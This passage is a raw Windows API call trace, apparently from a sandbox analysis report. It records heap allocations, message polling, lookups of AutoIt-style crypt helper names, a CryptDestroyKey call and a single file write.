Size=0xc) returned 0x2e51880 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0252.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0252.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0252.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0252.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.242] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0252.276] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0252.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0252.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0252.277] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0252.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0252.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0252.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.277] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0252.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0252.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0252.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0252.278] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.278] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.278] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0252.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0252.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0252.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0252.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.286] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0252.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0252.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.288] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0xb430, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0xb430, lpOverlapped=0x0) returned 1 [0252.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0252.293] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0252.293] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0252.293] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0252.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0252.294] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.294] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0252.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0252.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0252.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0252.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0252.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e516d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0252.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0252.295] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0252.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0252.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0252.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.296] CryptDestroyKey (hKey=0xa86f90) returned 1 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0252.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.297] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0252.298] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0252.298] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0252.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.299] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0252.299] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0252.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0252.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0252.299] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0252.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0252.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0252.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0252.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0252.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0252.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0252.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0252.301] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0252.301] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0252.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0252.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0252.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0252.301] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0252.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0252.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0252.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0252.301] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0252.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0252.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0252.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0252.302] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0252.302] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0252.302] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0252.302] 